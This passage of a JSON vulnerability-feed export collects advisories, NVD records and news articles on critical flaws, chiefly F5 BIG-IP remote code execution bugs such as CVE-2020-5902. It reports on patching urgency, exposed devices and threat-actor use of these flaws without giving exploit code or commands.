[**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 is below -\n\n * [Microsoft Exchange 
Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] 
puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging organizations to prioritize patching to minimize the risk of exploitation by malicious actors.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", 
"CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-06-13T18:00:21", "description": "A remote code execution vulnerability exists in F5 BIG-IP devices. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-03-22T00:00:00", "type": "checkpoint_advisories", "title": "F5 BIG-IP Remote Code Execution (CVE-2021-22986; CVE-2021-22987; CVE-2022-1388)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986", "CVE-2021-22987", "CVE-2022-1388"], "modified": "2022-06-13T00:00:00", "id": "CPAI-2021-0198", "href": "", "cvss": {"score": 
10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:38:38", "description": "A remote code execution vulnerability exists in F5 BIG-IP. Successful exploitation of this vulnerability could allow remote attackers to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-06T00:00:00", "type": "checkpoint_advisories", "title": "F5 BIG-IP Remote Code Execution (CVE-2020-5902)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-21T00:00:00", "id": "CPAI-2020-0628", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T14:26:25", "description": "On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, 12.1.x before 12.1.5.3, and 11.6.x before 11.6.5.3 when running in Appliance mode, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has an authenticated remote command execution vulnerability in undisclosed pages. 
Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-03-31T17:15:00", "type": "cve", "title": "CVE-2021-22987", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22987"], "modified": "2021-04-05T19:26:00", "cpe": [], "id": "CVE-2021-22987", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22987", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-07-13T15:59:24", "description": "On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the iControl REST interface has an unauthenticated remote command execution vulnerability. 
Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-31T15:15:00", "type": "cve", "title": "CVE-2021-22986", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-07-12T17:42:00", "cpe": [], "id": "CVE-2021-22986", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22986", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-07-13T16:58:49", "description": "In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 
"NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-01T15:15:00", "type": "cve", "title": "CVE-2020-5902", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager:15.0.1.4"], "id": "CVE-2020-5902", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5902", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:f5:big-ip_access_policy_manager:15.0.1.4:*:*:*:*:*:*:*"]}], "threatpost": [{"lastseen": "2021-03-11T14:39:21", "description": "F5 Networks is warning users to patch four critical remote command execution (RCE) flaws in its BIG-IP and BIG-IQ enterprise networking infrastructure. If exploited, the flaws could allow attackers to take full control over a vulnerable system.\n\nThe company released an advisory, Wednesday, on seven bugs in total, with two others rated as high risk and one rated as medium risk, respectively. 
\u201cWe strongly encourage all customers to update their BIG-IP and BIG-IQ systems to a fixed version as soon as possible,\u201d the company [advised](<https://www.f5.com/services/support/March2021_Vulnerabilities>) on its website.\n\nThe scenario is particularly urgent as F5 provides enterprise networking to some of the largest tech companies in the world, including Facebook, Microsoft and Oracle, as well as to a trove of Fortune 500 companies, including some of the world\u2019s biggest financial institutions and ISPs.\n\nThe U.S. Cybersecurity and Infrastructure Agency (CISA) also [urged](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/10/f5-security-advisory-rce-vulnerabilities-big-ip-big-iq>) companies using BIG-IP and BIG-IQ to fix two of the critical vulnerabilities, which are being tracked as [CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>) and [CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>).\n\nThe former, with a CVSS rating of 9.8, is an unauthenticated remote command execution vulnerability in the iControl REST interface, according to a [detailed breakdown](<https://support.f5.com/csp/article/K02566623>) of the bugs in F5\u2019s Knowledge Center. The latter, with a CVSS rating of 9.9, affects the infrastructure\u2019s Traffic Management User Interface (TMUI), also referred to as the Configuration utility. When running in Appliance mode, the TMUI has an authenticated RCE vulnerability in undisclosed pages, according to F5.\n\nThe two other critically rated vulnerabilities are being tracked as [CVE-2021-22991](<https://support.f5.com/csp/article/K56715231>) and [CVE-2021-22992](<https://support.f5.com/csp/article/K52510511>). 
The first, with a CVSS score of 9.0, is a buffer overflow vulnerability that can be triggered when \u201cundisclosed requests to a virtual server may be incorrectly handled by the Traffic Management Microkernel (TMM) URI normalization,\u201d according to F5. This can result in a denial-of-service (DoS) attack that, in some situations, \u201cmay theoretically allow bypass of URL based access control or remote code execution (RCE),\u201d the company warned.\n\nCVE-2021-22992 is also a buffer overflow bug with a CVSS rating of 9. This flaw can be triggered by \u201ca malicious HTTP response to an Advanced WAF/BIG-IP ASM virtual server with Login Page configured in its policy,\u201d according to F5. It also may allow for RCE and \u201ccomplete system compromise\u201d in some situations, the company warned.\n\nThe other three non-critical bugs being patched in F5\u2019s update this week are [CVE-2021-22988](<https://support.f5.com/csp/article/K70031188>), [CVE-2021-22989](<https://support.f5.com/csp/article/K56142644>) and [CVE-2021-22990](<https://support.f5.com/csp/article/K45056101>).\n\nCVE-2021-22988, with a CVSS score of 8.8, is an authenticated RCE that also affects TMUI. CVE-2021-22989, with a CVSS rating of 8.0, is another authenticated RCE that also affects TMUI in Appliance mode, this time when Advanced WAF or BIG-IP ASM is provisioned. And CVE-2021-22990, with a CVSS score of 6.6, is a similar but less dangerous vulnerability that exists in the same scenario, according to F5.\n\nF5 is no stranger to critical bugs in its enterprise networking products. In July, the vendor and other security experts\u2014including U.S. Cyber Command\u2014urged companies to deploy an urgent patch for a critical RCE vulnerability in BIG-IP\u2019s app delivery controllers that was being actively exploited by attackers to scrape credentials, launch malware and more. That bug ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)) had a CVSS rating of 10 out of 10. 
Moreover, a delay in patching at the time left systems [exposed to the flaw](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>) for weeks after F5 released the fix.\n", "cvss3": {}, "published": "2021-03-11T14:21:50", "type": "threatpost", "title": "F5, CISA Warn of Critical BIG-IP and BIG-IQ RCE Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5902", "CVE-2021-2290", "CVE-2021-22986", "CVE-2021-22987", "CVE-2021-22988", "CVE-2021-22989", "CVE-2021-22990", "CVE-2021-22991", "CVE-2021-22992"], "modified": "2021-03-11T14:21:50", "id": "THREATPOST:1D03F5885684829E899CEE4F63F5AC27", "href": "https://threatpost.com/f5-cisa-critical-rce-bugs/164679/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:22:26", "description": "About 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices are still vulnerable to full system access and remote code-execution (RCE), despite a patch for a critical flaw being available for two weeks.\n\nThe BIG-IP family consists of application delivery controllers, Local Traffic Managers (LTMs) and domain name system (DNS) managers, together offering built-in security, traffic management and performance application services for private data centers or in the cloud.\n\nAt the end of June, F5 issued urgent patches for a critical RCE flaw 
([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), which is present in the Traffic Management User Interface (TMUI) of the company\u2019s BIG-IP app delivery controllers. The bug has a CVSS severity score of 10 out of 10, and at the time of disclosure, Shodan [showed](<https://twitter.com/GossiTheDog/status/1279005317821497344/photo/1>) that there were almost 8,500 vulnerable devices exposed on the internet.\n\nShortly after disclosure, public exploits [were made](<https://twitter.com/wugeej/status/1280008779359125504?s=20>) available for it, leading to mass scanning for [vulnerable devices](<https://twitter.com/bad_packets/status/1279884302990237696?s=20>) by attackers, and ultimately active exploits.\n\n\u201cCVE-2020-5902 received the highest vulnerability rating of critical from the National Vulnerability Database due to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d Expanse researchers noted in [an advisory](<http://expanse.co/blog/expanse-researchers-show-more-than-8,000-f5-big-ip-tmuis-are-still-exposed-on-the-internet>) issued on Friday. \u201cIt was deemed so critical that U.S. Cyber Command [issued a tweet](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) on the afternoon of July 3, recommending immediate patching despite the holiday weekend. While F5 did not release a proof of concept (PoC) for the exploit, numerous PoCs began appearing on July 5.\u201d\n\nFast-forward to two weeks later, and patches have rolled out to less than 500 of that original group of vulnerable machines, according to the analysis. 
Expanse researchers said that as of July 15, there were at least 8,041 vulnerable TMUI instances still exposed to the public internet.\n\nThe stakes are high, as one would expect from a critical-rated bug: \u201cThe vulnerability CVE-2020-5902 allows for the execution of arbitrary system commands on vulnerable BIG-IP devices with an exposed and accessible management port via the TMUI,\u201d explained the researchers. \u201cThis vulnerability could provide complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serve as a hop point into other areas of the network.\u201d\n\nTo boot, an additional bug, [CVE-2020-5903](<https://support.f5.com/csp/article/K43638305>), affects the same vulnerable management interface via a cross-site scripting vulnerability (XSS) that Expanse said could also be leveraged to include RCE.\n\nDespite active exploits and security experts urging companies to deploy the urgent patch for the critical vulnerability, patching is clearly going slowly \u2013 something that Tim Junio, CEO and co-founder of Expanse, chalks up to a lack of visibility.\n\n\u201cPatching is likely proceeding slowly because organizations may not know that they have these TMUIs,\u201d Junio told Threatpost. \u201cIf they are unaware of their complete inventory of internet-connected systems and services, they will not have well-defined processes for patching them. Security teams are also often stretched thin and that can result in delays in patching, even for critical items like this.\u201d\n\nJunio also told Threatpost that if a malicious actor gained this type of remote access it could be catastrophic \u2013 and yet the bug carries an ease of exploitation that he likens to a Jedi mind trick.\n\n\u201cAn attacker just needs to send the firewall a set of commands, which are now publicly known, in order to take over the firewall,\u201d he explained. 
\u201cA physical world analogy: If a firewall is a bit like a guard and a gate at the entrance of a facility that is surrounded by walls, this exploit is like a Jedi mind trick whereby an attacker can walk right up to the guard, suggest to the guard they leave their post and give the attacker a guard uniform and all keys to the gate \u2013 and _the guard will say yes_.\u201d\n\nThe attacker can then carry out all sorts of different nefarious activities in the context of a privileged user.\n\nJunio explained, continuing his analogy, \u201cIn other words, the attacker can now walk into the facility unimpeded (unauthorized access); bring sensitive data and objects out of the facility unimpeded (exfiltration); and can close the gate to legitimate people trying to enter the facility (denial of service); among many other actions.\u201d\n\nThe TMUI is responsible for configuration, and Junio noted that there\u2019s generally no reason for it to be exposed to the internet \u2013 so, a simple interim mitigation (albeit not a full one) in lieu of patching would be to remove it from public view.\n\n\u201cThis is a very concerning number of exposed TMUIs on the internet,\u201d said Junio. \u201cA hack of a major enterprise via this type of attack vector could be very damaging to that organization.\u201d\n\nHe added that he believes that an attack on any number of enterprises could go so far as to be harmful to the global economy.\n\n\u201cActual day-to-day users of F5 equipment are generally going to be security operations, network operations or infrastructure professionals,\u201d said Junio. 
\u201cBigger picture, the customers/buyers of this technology are some of the world\u2019s largest enterprises and government agencies.\u201d These include 48 out of the Fortune 50, he added, though he\u2019s not aware which, if any, of these specific installations are vulnerable to attack.\n", "cvss3": {}, "published": "2020-07-17T20:59:33", "type": "threatpost", "title": "Thousands of Vulnerable F5 BIG-IP Users Still Open to Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135", "CVE-2020-5902", "CVE-2020-5903"], "modified": "2020-07-17T20:59:33", "id": "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3", "href": "https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-01T21:47:35", "description": "An APT group known as Pioneer Kitten, linked to Iran, has been spotted selling corporate-network credentials on hacker forums. The credentials would let other cybercriminal groups and APTs perform cyberespionage and other nefarious cyber-activity.\n\nPioneer Kitten is a hacker group that specializes in infiltrating corporate networks using open-source tools to compromise remote external services. 
Researchers observed an actor associated with the group advertising access to compromised networks on an underground forum in July, according to a [blog post](<https://www.crowdstrike.com/blog/who-is-pioneer-kitten/>) Monday from Alex Orleans, a senior intelligence analyst at CrowdStrike Intelligence.\n\nPioneer Kitten\u2019s work is related to other groups either sponsored or run by the Iranian government, which [were previously seen](<https://www.zdnet.com/article/iranian-hackers-have-been-hacking-vpn-servers-to-plant-backdoors-in-companies-around-the-world/>) hacking VPNs and planting backdoors in companies around the world.\n\nIndeed, the credential sales on hacker forums seem to suggest \u201ca potential attempt at revenue stream diversification\u201d to complement \u201cits targeted intrusions in support of the Iranian government,\u201d Orleans wrote. However, Pioneer Kitten, which has been around since 2017, does not appear to be directly operated by the Iranian government but is rather sympathetic to the regime and likely a private contractor, Orleans noted.\n\nPioneer Kitten\u2019s chief mode of operations is its reliance on SSH tunneling, using open-source tools such as Ngrok and a custom tool called SSHMinion, he wrote. The group uses these tools to communicate \u201cwith implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP)\u201d to exploit vulnerabilities in VPNs and network appliances to do its dirty work, Orleans explained.\n\nCrowdStrike observed the group leveraging several critical exploits in particular \u2014 [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and most recently, [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>). 
All three exploits affect VPNs and networking equipment, including Pulse Secure \u201cConnect\u201d enterprise VPNs, Citrix servers and network gateways, and F5 Networks BIG-IP load balancers, respectively.\n\nPioneer Kitten\u2019s targets are North American and Israeli organizations in various sectors that represent some type of intelligence interest to the Iranian government, according to CrowdStrike. Target sectors run the gamut and include technology, government, defense, healthcare, aviation, media, academic, engineering, consulting and professional services, chemical, manufacturing, financial services, insurance and retail.\n\nWhile not as well-known or widespread in its activity as other nation-state threats such as China and Russia, Iran has emerged in recent years as a formidable cyber-enemy, amassing a number of APTs to mount attacks on its political adversaries.\n\nOf these, Charming Kitten\u2014which also goes by the names APT35, Ajax or Phosphorus\u2014appears to be the most active and dangerous, while others bearing similar names seem to be spin-offs or support groups. Iran overall appears to be ramping up its cyber-activity lately. CrowdStrike\u2019s report actually comes on the heels of news that Charming Kitten also has [resurfaced recently](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>). A new campaign is using LinkedIn and WhatsApp to convince targets \u2014 including Israeli university scholars and U.S. government employees \u2014 to click on a malicious link that can steal credentials.\n\nOperating since 2014, Charming Kitten is known for politically motivated and socially engineered attacks, and often uses phishing as its attack of choice. 
Targets of the APT, which uses clever social engineering to snare victims, have been [email accounts](<https://threatpost.com/iran-linked-hackers-target-trump-2020-campaign-microsoft-says/148931/>) tied to the Trump 2020 re-election campaign and [public figures and human-rights activists](<https://threatpost.com/charming-kitten-uses-fake-interview-requests-to-target-public-figures/152628/>), among others.\n", "cvss3": {}, "published": "2020-09-01T13:35:19", "type": "threatpost", "title": "Pioneer Kitten APT Sells Corporate Network Access", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2020-09-01T13:35:19", "id": "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "href": "https://threatpost.com/pioneer-kitten-apt-sells-corporate-network-access/158833/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:17:15", "description": "Security experts are urging companies to deploy an urgent patch for a critical vulnerability in F5 Networks\u2019 networking devices, which is being actively exploited by attackers to scrape credentials, launch malware and more.\n\nLast week, F5 Networks issued urgent patches for the critical remote code-execution flaw ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), which has a CVSS score of 10 out of 10. The flaw exists in the configuration interface of the company\u2019s BIG-IP app delivery controllers, which are used for various networking functions, including app-security management and load-balancing. Despite a patch being available, Shodan [shows](<https://twitter.com/GossiTheDog/status/1279005317821497344/photo/1>) almost 8,500 vulnerable devices are still available on the internet.\n\nNot long after the flaw was disclosed, public exploits [were made](<https://twitter.com/wugeej/status/1280008779359125504?s=20>) available for it, leading to mass scanning for [vulnerable devices](<https://twitter.com/bad_packets/status/1279884302990237696?s=20>) by attackers and ultimately active exploits. 
Researchers warn that they\u2019ve seen attackers targeting the flaw over the weekend for various malicious activities, including launching [Mirai variant DvrHelper](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>), deploying cryptocurrency mining malware and [scraping credentials](<https://twitter.com/GossiTheDog/status/1279856862888898568>) \u201cin an automated fashion.\u201d\n\nRich Warren, principal security consultant for NCC Group, [said Monday on Twitter](<https://twitter.com/buffaloverflow/status/1279384540847489024>) that \u201cas of this morning we are seeing an uptick in RCE attempts against our honeypots, using a combination of either the public Metasploit module, or similar via Python.\u201d\n\n> Ok, we are seeing active exploitation of CVE-2020-5902\n> \n> Patch it today\n> \n> \u2014 Rich Warren (@buffaloverflow) [July 4, 2020](<https://twitter.com/buffaloverflow/status/1279384540847489024?ref_src=twsrc%5Etfw>)\n\nThe exploit of the flaw is trivial: Mikhail Klyuchnikov with Positive Technologies, [who originally discovered the 